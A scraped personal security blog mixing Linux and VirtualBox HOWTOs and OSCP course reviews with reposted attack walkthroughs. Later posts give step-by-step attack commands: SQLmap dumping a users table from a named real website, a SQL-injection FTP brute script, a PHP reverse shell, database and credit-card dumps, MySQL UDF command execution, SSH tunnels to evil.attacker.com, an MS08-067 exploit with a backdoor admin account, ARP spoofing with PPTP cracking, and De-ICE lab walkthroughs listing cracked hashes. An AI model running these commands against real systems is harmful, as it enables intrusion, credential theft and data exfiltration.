Samiux's Blog

HOWTO : Using USB Devices on VirtualBox 4.1.8

2012-01-28T01:14:00.001+08:00

Using USB devices on VirtualBox 4.1.8, which is installed on Ubuntu 12.04 LTS, is easy.

usermod -a -G vboxusers samiux

*where samiux is the user name

Then, logout and re-login. Or, reboot your system.

Now, you can use USB devices on VirtualBox without any problem. However, some devices do not work properly on USB 2.0 enabled on VirtualBox.

That's all! See you.

HOWTO : Create a normal user on MySQL and MariaDB

2012-01-22T00:49:00.000+08:00

Using a root account on the web applications as user is risky. It is more secure to create a normal user for the web applications.

Step 1 :

mysqladmin -u samiux -p create mydatabase

*where samiux is the normal username and mydatabase is the name of the database of the web applications

Step 2 :

mysql -u root -p

Step 3 :

GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER ON mydatabase.* TO 'samiux'@'localhost' IDENTIFIED BY 'mypassword';

*where mypassword is the password of the user samiux

That's all! See you.

Course Review - Am I ready for taking Penetration Testing with BackTrack (PWB)

2012-01-21T23:46:00.001+08:00

If you decided to take the course - Penetration Testing with BackTrack (PWB), you are required to make sure your knowledge and hardwares are suitable or not. I am now going to share my experience with you all.

Although this course is an entry-level course of Offensive Security, you are required to have some knowledge of networking (including TCP/IP) and capable of operating Linux and Windows systems in command line.

You are also required to have some knowledge of programming. You are not required to be an elite programmer, but you need to understand what a program is and how to read it as well as understand what it is doing. The involved programming language are perl, c, python and bash shell script.

Using of virtual machine, such as VMWare Player or VirtualBox is required. It is because most of the students of the course running their BackTrack on the virtual machine instead of a dedicated machine. That means, you have at least 2GB of system memory for the host computer and guest machine. At least 1GB RAM for the guest will make you more comfortable.

A reasonable speed of internet connection is required. The lab is running on OpenVPN and your router (if any) should be capable of handling VPN connecting. After you registered to the course, you will have chance to test the VPN connection. If the connection is confirmed fine, you can then make the payment. Otherwise, you are not suitable to take the course and do not make the payment.

I have connecting the VPN over my Galaxy Nexus and/or Nexus One on 3G data connection via wifi share with no problem. Anyway, it all depends on the 3G connection quality.

If you will do your lab access at any place, you are suggested to install the BackTrack on the virtul machine and host it on a laptop. The size of the virtual machine is around 20GB as I find this size is more comfortable.

In addition, it is time. Make sure you have a lot of time to do the course and lab. As this course is very hard and time consuming as well as demanding, make sure your family members understood that you have a little time or have no time with them during the course. Sometimes, I even not sleeping for over 24 hours in order to compromise a box in the lab.

At last, taking care of yourself. Do not get flu or sick during the course. Hope you all enjoy the course as I was.

Course Review - Penetration Testing with BackTrack (PWB)

2012-01-21T18:21:00.004+08:00

The Background

About 2 to 3 years ago, I came to know BackTrack 3 and 4. I did not know what this distribution for. At that time, I knew that it is for bad guys according to a local computer magazine.

Later, I came to know the term of "Penetration Testing" and I wanted to know more about this kind of technology and skill. I searched for the videos on the YouTube and learnt something new. However, I did not fully understand what the videos actually talking about and doing.

Some guys in the internet stated that this course (Penetration Testing with BackTrack) is teaching you how to use the BackTrack Linux distribution only and nothing more. Okay, that was not bad at all as I knew nothing about this distribution. Why not took it a try?

Last year, I decided to take this course to learn more about Penetration Test and registered. The course vesion is 3.0 at the time when I took it and it is working very well on BackTrack 5 R1. The price is not high compares with other Information Security courses in the market.

The Course

This course is designed for beginners just like me. It requires you have some knowledge of networking and some programming experience as well as to know how to use Linux and Windows systems. This course is not designed for very skilled and experienced Penetration Testers, in my opinion.

You have a VPN lab, which equipped with several subnets and over 50 machines (I discovered 58), to practice what you have learnt from the course materials. Those machines in the lab are not designed for simple or single step exploitation. You are required to use your creative thinking and skill to compromise those machines.

You are not required to compromise all the machines in the lab in order to take the final challenge, the exam. You can even compromise one machine in the lab and then enroll for the exam. You have 23 hours and 45 minutes to do the exam and submit the report within the next 24 hours. You should enroll the exam within 90 days after the expiration of the lab access time unless you extended it.

The compromised machines in the lab is required to document as well as the exercises in the course materials. In addition, the extra miles in the exercises may count for the exam, I think. So, I suggest to do them all if you can.

In my opinion, make some friends in the #offsec irc channel may help you to solve some problems during the lab access. The most interested thing is that the officials at #offsec irc channel will not help you much for the lab. Sometimes, they may give out hints but sometimes are misleading or useless. They will also tell you to "Try Harder!". Yes, "Try Harder!" is their slogan.

The Challenge

The exam was not easy as I think especially under the pressure. My exam was started in the late evening, that means, I needed to do the exam overnight in the early beginning due to my time zone. I was very tired during the exam. Even I took an hour or so nap, I could not thinking very well. I did some careless mistakes or silly things during the exam and I was wasting a lot of time. My mind was blocked with the problems that I came across. I did not perform very well in the exam.

Finally, the exam was over and the report was submitted. Within 3 business days, I received an email which informed me that I passed the challenge. If you passed the challenge, you will be an Offensive Security Certified Professional (OSCP). I am an OSCP now!

The Conclusion

In conclusion, this course will teach you all the basic Penetration Testing skill and it is worth to take if you are not a very skilled and experienced in this field. I am very enjoy during the course. I learn a lot with the lab and course materials. Recommended!

HOWTO : BackTrack 5 R1 Minor Bug Fix

2012-01-19T22:34:00.000+08:00

(A) unicornscan GeoIP not found :

cp /usr/share/GeoIP/GeoIP.dat /usr/local/etc/unicornscan/

(B) Waiting for audio system to respond

mkdir ~/.config/autostart

nano ~/.config/autostart/pulseaudio.desktop



[Desktop Entry]

Type=Application

Exec=/usr/bin/pulseaudio

Hidden=false

NoDisplay=false

X-GNOME-Autostart-enabled=true

Name=Pulseaudio

Comment=Start Pulseaudio

dpkg-reconfigure wicd

update-rc.d wicd defaults

BackTrack WiKi
BackTrack WiKi

HOWTO : Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7-3930K

2012-01-01T23:44:00.007+08:00

The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is here.

Download Cryptohaze-Linux_x64_1_30.tar.bz2

tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2

cd Cryptohaze-Linux

nano single_charset

Append the following :

ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=\][';/.,

Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :

./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500

Hardware Configuration :

CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : Seagate SATA II 1TB x 2
Power Supply : Seasonic X-series 1250W
CPU Heat Sink : Corsair H100 Liquid CPU Cooler
Case : Corsair Graphite Series 600T Black

Remarks :

Installation of CUDA on Back|Track 5 R1

That's all! See you.

HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10

2011-12-25T16:49:00.001+08:00

This tutorial is not my work but is OhHeyitsLou. Please credit to him.

Step by step tutorial

Youtube step by step tutorial

That's all! See you.

HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card

2011-12-25T03:46:00.001+08:00

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R1

BackTrack 5 R1 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install the BackTrack 5 R1 as usual. When it is required to reboot, do not remove the BackTrack 5 R1 CD. Boot up the CD accordingly. After the BackTrack 5 R1 is booted up, mount the hard drive and add "nomodeset" to boot option of the grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will be boot into BackTrack 5 R1 without problem.

Installation of nVidia display driver

Go to nVidia Deleloper Zone CUDA Toolkit 4.0 to download the following. Do not enter to X11 by issuing "startx"; otherwise, the installation will be failed.

(1) Download "Developer Drivers for Linux (270.41.19)" for the nVidia Driver.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run

chmod +x devdriver_4.0_linux_xx_270.41.19.run

./devdriver_4.0_linux_xx_270.41.19.run

(2) Download "CUDA Toolkit for Ubuntu Linux 10.10" for the CUDA Toolkit.

32-bit :

wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run

64-bit :

wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run

./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

chmod +x gpucomputingsdk_4.0.17_linux.run

./gpucomputingsdk_4.0.17_linux.run

nano /root/.bashrc

Append the following :

export PATH=$PATH:/usr/local/cuda/bin

LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64

After that, reboot the system to make the nVidia driver effect.

Installation of pyrit

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

python setup.py install

To test if the installation is correct or not.

pyrit list_cores

pyrit benchmark

pyrit benchmark_long

That's all! See you.

HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card

2011-12-23T00:48:00.000+08:00

At this writing, Ubuntu 12.04 LTS is still under heavy development and at Alpha 1 stage.

It is no problem to boot Ubuntu 12.04 LTS on Intel X79 Express Chipset due to Kernel version 3.2.

If the system is equipped with nVidia display card, you need to set "nomodeset" by pressing F6 on the boot up menu of the Live CD of Ubuntu 12.04 LTS. (Press Enter when "keyboard" and "human" figures appear on the bottom on the screen when booting up)

That's all! See you.

Exploit writing tutorial

2011-12-10T17:55:00.003+08:00

The is the summary of the Corelan's Exploit writing tutorial offical site.

Part 1 : Stack Based Overflows

Part 2 : Stack Based Overflows - jumping to shellcode

Part 3 : SEH Based Exploits

Part 3b : SEH Based Exploits - just another example

Part 4 : From Exploit to Metasploit - The basic

Part 5 : How debugger modules & plugins can speed up basic exploit development

Part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR

Part 7 : Unicode - from 0x00410041 to calc

Part 8 : Win32 Egg Hunting

Part 9 : Introduction to Win32 shellcoding

Part 10 : Chaining DEP with ROP - the Rubik's Cube

Part 11 : Heap Spraying Demystified

That's all! See you.

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

2011-09-16T18:54:00.001+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to :ruo911

This is ruo911's work but not mine. I re-post it for educational purpose only.

Command

cd /pentest/web/scanners/sqlmap

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump

try login.

p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap

2. user agent options
example)
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"

That's all! See you.

HOWTO : SQL Injection by tools

2011-09-16T18:53:00.001+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : medmado1990

This is medmado1990's work but not mine. I re-post it for educational purpose only.

That's all! See you.

HOWTO : Blind SQL Injection

2011-09-16T18:52:00.001+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : KFProdigy

This is KFProdigy's work but not mine. I re-post it for educational purpose only.

Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!

For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.

THE THINGS I PASTE
group_concat(table_name)

from information_schema.tables where table_schema=database()--

concat(column,0x3a,column) from table/*

An example would be
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--

That's all! See you.

Official SQLMap video demo series

2011-09-15T14:42:00.002+08:00

HOWTO : Offical SQLMap video demonstration 12

2011-09-15T14:29:00.002+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections, then exploit a database's stored procedure heap-based buffer overflow vulnerability (MS09-004) if it is Microsoft SQL Server 2000 or 2005. sqlmap relies on Metasploit to create the shellcode which gets executed upon successful exploiting of the buffer overflow on the database server and establishes the connection between the user's machine and the database server.

The control is passed over to the Metasploit command line interface where the user can proceed to privilege escalate to SYSTEM by exploiting MS10-015 vulnerability with Meterpreter getsystem command.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/iis/get_int.asp?id=1 --os-bof -v 1 --msf-path ~/software/metasploit

That's all! See you.

HOWTO : Offical SQLMap video demonstration 11

2011-09-15T14:25:00.002+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, ASP and PHP languages do not support stacked queries (ASP.NET does though): there is no way to inject different SQL statements in the same HTTP request.

As a result, sqlmap uploads a web shell in a writable directory within the web server document root and uses it to execute the Metasploit payload stager previously created. The out-of-band command prompt session is now established and the control is passed over to the Metasploit command line interface.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 10

2011-09-15T14:21:00.002+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server then escalating database process' user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database.

Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function.

The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 9

2011-09-15T14:17:00.000+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap command execution features: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being MySQL 5.0.

The tool is instructed to identify possible SQL injections and exploit them by spawning an interactive command prompt where the user can execute commands on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database then shows the command prompt.

For each command the user can choose if he wants to retrieve the command standard output or, alternatively, automatically retrieve the output for all commands. If the answer is positive (y or a), sqlmap executes the command once and stores its standard output in a support table.

Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards.

This technique is also implemented for PostgreSQL. On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/iis/get_int_50.aspx?id=1 --os-shell -v 1 --union-use

That's all! See you.

HOWTO : Offical SQLMap video demonstration 8

2011-09-15T14:11:00.002+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap command execution features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by executing a command on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database. Then it asks the user if he wants to retrieve the command standard output.

If the answer is positive, sqlmap executes the command once and stores its standard output in a support table. Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards. This technique is also implemented for MySQL.

On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.8.4.php?id=1 --os-cmd "id" -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 7

2011-09-15T14:01:00.002+08:00

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 6

2011-09-15T13:56:00.002+08:00

HOWTO : Offical SQLMap video demonstration 5

2011-09-15T13:50:00.002+08:00

HOWTO : Offical SQLMap video demonstration 4

2011-09-15T13:46:00.000+08:00

HOWTO : Offical SQLMap video demonstration 3

2011-09-15T13:40:00.002+08:00

python sqlmap.py -u http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 2

2011-09-15T13:34:00.001+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap enumeration features with verbose output: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition.

The tool is instructed to identify possible SQL injections, check if they are also exploitable via UNION query SQL injection technique, then enumerate the banner and the session user's password hash(es).

The technique used to dump this data from the back-end database software is specified by the user as UNION query SQL injection. If the parameter was not affected by UNION query SQL injection, sqlmap would have fallen back to the default technique, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_init.php?id=1 -b --passwords -U CU --union-use -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 1

2011-09-15T13:28:00.002+08:00

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/get_init.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

That's all! See you.

HOWTO : Penetration Testing in the Real World

2011-09-12T11:03:00.009+08:00

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***

Credit to : muts (of Offensive Security)

This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.

ftp-brute.py



#!/usr/bin/python

from ftplib import FTP

print "Attempting user Directory Discover via FTP"

for i in range(0,6):



   username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --  "

   password=str("1")

   ftp=FTP('www.offseclabs.com')

   ftp.login(username,password)

   print "Logged in as user "+str(i)+",1"

   ftp.retrlines('LIST')

   ftp.close()

Commands



Open Terminal A :



nmap -p 21,80 www.offseclabs.com

nc -v www.offseclabs.com 80

HEAD / HTTP/1.0

(To enumerate the webserver)

clear



ftp www.offseclabs.com

username - bob

password - bob

(To enumerate the ftp server)



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  

password - 1



(logged in to the ftp server)

pwd

ls

bye



clear



cd core

clear

nano brute.py --> (see above ftp-brute.py)

./brute.py

(get the fifth user who has mapped to the root directory of webserver)

clear



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  

password - 1



(logged in as the fifth user)

ls

put rs.php --> (a reverse php shell)



-----------------------

Open Terminal B :



nc -lvp 80



-----------------------

Open Terminal C :



wget www.offseclabs.com/rs.php



(Then, at Terminal B, we got a reverse shell)



-----------------------

Go back to Terminal B :

(inside the reverse shell)



/sbin/ifconfig

pwd

cd /var/www

ls -la

cd includes

cat configure.php

(get the MySQL username and password as well as MySQL server address and database name)



mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt



------------------------

Open a Firefox :



www.offseclabs.com/images/ccdump.txt

(we got the database dump)



-------------------------

Go back to Terminal A :



(inside the ftp server)

put up.html --> (file upload html file)

put up.php -- > (file upload php file)



-------------------------

Open Firefox :



www.offseclabs.com/up.html



(upload lib_mysqludf_sys.so and marked it as 1)

(upload rs [a binary reverse shell) and marked it as 2)



** Details of lib_mysqludf_sys.so



---------------------------

Go back to Terminal A :



(quit the ftp server)

bye

clear

exit

(quit Terminal A)



----------------------------

Go back to Terminal B :



mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5

(login to MySQL server)

use pwn;

SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';

SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';



CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';



SELECT sys_eval('chmod 755 /tmp/bd');

SELECT sys_eval('/tmp/bd &');

(don't press Enter at this moment)



---------------------------

Open Terminal D :



nc -lvp 80



(go back to Terminal B and press enter, you will get reserver shell at Terminal D)



----------------------------

Open Terminal E :



nc -lvp 80



----------------------------

Go back to Terminal B :



(inside the MySQL server)

SELECT sys_eval('/tmp/bd &');



(press enter and we got another reverse shell at Terminal E)



---------------------------

Go back to Terminal E :



(inside the reverse shell)

ping -c 1 10.150.0.20

clear



ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com

(create a remote tunnel at port 445)



-----------------------------

Open Terminal F :



netstat antp

nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse



-----------------------------

Go back to Terminal D :



ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com

(create a remote tunnel at port 4444)



clear



------------------------------

Go back to Terminal F :



cd core

nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)

clear

./nx.py 127.0.0.1

nc -v 127.0.0.1 4444



(we got a remote shell of 10.150.0.20)

ip config

net user hacker hacker /add

net localgroup administrators hacker /add



---------------------------------

Go back to Terminal D :



(quit the tunnel)

exit

clear



ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com

(create another remote tunnel on port 3389)

clear



-----------------------------------

Open Terminal G :



netstat -antp | grep LISTEN

clear

rdesktop 127.0.0.1



(login to the 10.150.0.20 with username - hacker and password - hacker)

That's all! See you.

g0tmi1k's Video Series

2011-09-12T01:02:00.000+08:00

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

2011-09-12T00:41:00.002+08:00

echo 1 > /proc/sys/net/ipv4/ip_forward



arpspoof -i eth1 -t 10.0.0.3 10.0.0.9



arpspoof -i eth1 -t 10.0.0.9 10.0.0.3



wireshark -i eth1 -k



python chap2asleap.py

python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v



cd /pentest/passwords/wordlists

cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

That's all! See you.

HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

2011-09-12T00:28:00.000+08:00

nmap -n 192.168.1.1-255



nmap -n -sS -sV -O 192.168.1.100



firefox 192.168.1.100



[+]kate -> make list of possible usernames. Save. Filename: usernames

// lastF, fLast



hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s



ssh bbanter@192.168.1.100

// "Yes" if quiz about trusting authenticity. Password: bbanter



cd /etc/



cat passwd



[+]kate -> Update usernames. Save.



cat group



exit



cd /root/tools/dictionary/



cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords



hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords



ssh aadams@192.168.1.100

// Password: nostradamus



cd /etc/



sudo cat shadow

// Password: nostradamus



[+]kate -> New -> Paste -> Save. Filename: shadow



exit



john



./john --rules --wordlist=/root/passwords --users=root /root/shadow

// Password: tarot



ssh aadams@192.168.1.100

// Password: nostradamus



su

// Password: tarot



ls -a



cd ..



ls -a



cd ftp

/



ls -a



cd incoming/



ls -a



openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot



cd /etc/



vi vsftpd.conf

// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)



modprobe capability



exit



exit



ftp 192.168.1.100

// User: root. Password: tarot



ls -a



cd ..



ls -a



cd home



ls -a



cd ftp



ls -a



cd incoming



ls -a



get salary.csv



cd /pentest/passwords/jtr



ls



mv salary.csv ~



[+]kate -> salary.csv



// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::

aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::

bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::

ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

----------------------------------------------------------------------------------------------------

Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

2011-09-12T00:21:00.002+08:00

nmap -n 192.168.1.1-255



nmap -n -sS -sV -O 192.168.1.110



firefox 192.168.1.110



[+]kate -> make list of possible usernames



// lastF, fLast



ftp 192.168.1.110



// Username: anonymous. Password: [Blank]



ls -a



cd download



ls -a



cd etc



ls -a



get core



exit



strings core



[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow



cd tools/dictionary/



cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords



john



./john --rules --wordlist=/root/passwords /root/shadow

//Password: root:Complexity & ccofee:Diatomaceous



ssh ccofee@192.168.1.110

//Password: Diatomaceous



ls -a



cd ..



ls -a



cd root/



ls -a



cd .save/



su

//Password: Complexity



cd .save/



ls -a



cat copy.sh



openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw



ls -a



cat customer_account.csv

// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:Complexity      = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:              = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:  99999:7:::

bbanter:Zymurgy      = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0  :99999:7:::

ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

----------------------------------------------------------------------------------------------------

Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you!

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

2011-09-12T00:02:00.002+08:00

nmap -n 192.168.2.1-255



nmap -n -sV -sS -O 192.168.2.100



nmap -n -sV -sS -O 192.168.2.101



firefox 192.168.2.100



[+]kate -> list of possible usernames. Save. Filename: usernames.txt



firefox 192.168.2.101



